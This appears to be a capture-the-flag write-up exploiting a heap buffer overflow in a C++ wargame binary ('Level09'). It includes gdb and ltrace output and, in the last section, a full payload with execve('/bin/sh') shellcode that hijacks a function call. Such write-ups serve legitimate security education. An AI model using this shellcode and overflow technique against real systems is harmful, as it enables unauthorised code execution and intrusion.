# Level09

## Observations

1. The program was written in **C++** and create 2 instances of a class called `N` with the `new` operator.
2. The method `N::setAnnotation()` is called on `n1`. This methods uses `memcpy()` to copy `argv[1]` to `n1->annotation`.
4. At some point the program dereference EAX twice then calls the result.

## Plan

We will use a Buffer Overflow to overwrite EAX to the address of the address of our buffer.

### Find the address of the buffer

```bash
ltrace ./level9 hello
    [...]
    strlen("hello") = 5
    memcpy(0x0804a00c, "hello", 5) = 0x0804a00c
```
Our buffer starts at **0x0804a00c**.

### Find the amount of bytes we need to write to reach EAX

We will run the program with a *Buffer Overflow Pattern Generator* and look at the value of EAX when it segfaults.
```txt
(gdb) run $(python -c 'print "Aa0Aa1[...]"')
Starting program: /home/user/level9/level9 $(python -c 'print "Aa0Aa1[...]"')

Program received signal SIGSEGV, Segmentation fault.
0x08048682 in main ()
(gdb) info registers eax
eax            0x41366441       1094083649
```
We need to write **108** characters to start messing with **EAX**.

## Payload

EAX is dereferenced twice so we need to give it the address of the address of [our shellcode](http://shell-storm.org/shellcode/files/shellcode-811.php).  
We overflow EAX to give it the value of the start of our buffer (*0x0804a00c*) that contains the address of our shellcode (*0x0804a010*) which is just 4 bytes further.

```bash
./level9 `python -c 'print "\x08\x04\xa0\x10"[::-1] + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "A" * 76 + "\x08\x04\xa0\x0c"[::-1]'`
```